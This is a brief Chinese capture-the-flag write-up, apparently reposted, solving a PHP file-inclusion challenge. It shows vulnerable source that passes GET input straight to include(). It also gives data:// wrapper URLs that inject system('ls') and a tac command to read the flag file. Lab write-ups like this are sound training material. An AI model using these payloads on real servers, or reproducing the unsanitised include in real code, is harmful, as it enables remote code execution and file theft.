Web_php_include文件包含
Posted limo亮少
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Web_php_include文件包含相关的知识,希望对你有一定的参考价值。
开始访问页面
发现已经给出了php源码
下面我们查查他有哪些文件
http://xxx/?page=data://text/plain,<?php system("ls")?>
发现有三个文件
一眼就能够看出flag肯定是我们需要查看的文件
接着查看它
http://xxxx3:9998/?page=data://text/plain,<?php system("cat flag.php")?>
发现该页面没有什么变化
尝试将cat命令换成tac
发现flag出来了
$flag="key2:5Fvcs07N";
下面是源码
<?php
show_source(__FILE__);
echo $_GET[\'hello\'];
$page=$_GET[\'page\'];
//while (strstr($page, "php://")) {
// $page=str_replace("php://", "", $page);
//}
include($page);
?>
以上是关于Web_php_include文件包含的主要内容,如果未能解决你的问题,请参考以下文章